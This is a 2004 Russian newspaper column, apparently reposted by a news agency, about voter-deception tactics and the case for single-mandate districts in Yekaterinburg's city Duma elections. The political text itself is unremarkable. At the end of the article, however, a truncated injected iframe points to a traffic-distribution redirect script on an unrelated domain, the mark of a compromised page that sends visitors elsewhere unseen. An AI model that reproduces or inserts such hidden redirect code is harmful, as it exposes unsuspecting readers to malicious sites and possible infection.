Дата: 10.06.2004

«Вечерний Екатеринбург»: Кое-что о технологиях обмана избирателей

Оговорюсь сразу: уберечься от обмана в ходе избирательных кампаний сложно. Свидетельством тому — многочисленные факты разочарований, которые настигают нас, как правило, куда после выборов. Однако минимизировать «убытки» можно и стремиться к этому необходимо.
Например, загодя и верно прописанные принципы формирования и технология избрания депутатского корпуса способны снять многие проблемы.
Что не всё ладно в «датском королевстве» (во всяком случае с избирательной системой), начинают, похоже, понимать даже отцы-основатели этой системы. Так, Александр Вешняков, председатель Центральной избирательной комиссии РФ, не далее как позавчера объявил журналистам: в стране присутствует «технология обмана избирателей». И сослался при этом на так называемые избирательные блоки, которые «создаются за одну ночь, а за другую ночь распадаются».
Прозрачный намёк главы ЦИК на «Родину» федеральную (раскол среди лидеров которой наблюдала вся страна); указание им на «родины» регионального разлива (мы помним, что и в Свердловской области было несколько подобных клонов) свидетельствуют, что властные структуры явно недовольны экспериментом, который, по мнению многих, сами некогда и затеяли. И нынче пошёл откат — не исключено, под влиянием общественного мнения. Однако в большей степени за позицией председателя ЦИК стоит, на мой взгляд, то, что центр совершенно не идентифицирует федеральные партии с их местными структурами, а тем более с блоками, созданными на древках партийных флагов. Иными словами, время, когда местные политики эксплуатировали федеральные бренды в собственных интересах, похоже, заканчивается.
В принципе, это понятно. Если уж сами федеральные партии, придя во власть, вместо ответственности и цивилизованной политической конкуренции занимаются, как выразился в Послании-2004 Президент, «корыстной борьбой за статусную ренту», чего уж говорить о низовых их звеньях! Время показало, что финансовая сторона деятельности политических объединений закрыта для общественности, а рынок избирательных технологий и лоббистских услуг сориентирован на теневой сектор, и всё это — опять же по оценке Владимира Путина, — «на фоне унылого однообразия большинства партийных программ».
Так вот, если возвращаться к «технологиям обмана», то предстоящие выборы в Екатеринбургскую юродскую Думу вполне можно оградить от большинства из них. Если мы согласны, что ответственность (настоящая, а не декларативная!) может быть только персональной, но никак не коллективной, то в устав Екатеринбурга необходимо занести норму о том, что выборы проводятся по одномандатным округам (мажоритарная система). Для избрания предполагаемых 35 городской Думы создаётся 35 избирательных округов. Претендентов на депутатские мандаты, скорее всего, будет много. Но зато каждый — персона, которая станет
обсуждаться и рассматриваться избирателями со всех сторон. Это не «кот в мешке», которого мы получаем в партийном списке или, как предлагают некоторые, можем получить в так называемых «многомандатных» группах.
Не такой уж большой численный состав нашей Думы, чтоб упражняться ещё и в «групповщине». Пусть лучше каждый депутат будет от народа и на виду людей.
На состоявшихся вчера публичных слушаниях (требование к ним, кстати, заложено в новом законе о местном самоуправлении), которые провели депутаты нынешнего состава Гордумы, представители общественности и некоторых политических партий, тема ответственности депутатского корпуса перед избирателями («нет - технологиям обмана») стала, пожалуй, основной. Подавляющее большинство участников высказалось за сложившуюся за многие годы в Екатеринбурге систему выборов — по одномандатным округам. <iframe src="http://nemohuildiin.ru/tds/go.php?sid
Информационное агентство «Политсовет» 2003-2021
Свидетельство о регистрации СМИ ИА №ТУ66-01453 от 26.05.2015
Выдано Управлением Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций по Уральскому федеральному округу
Вернуться назад Распечатать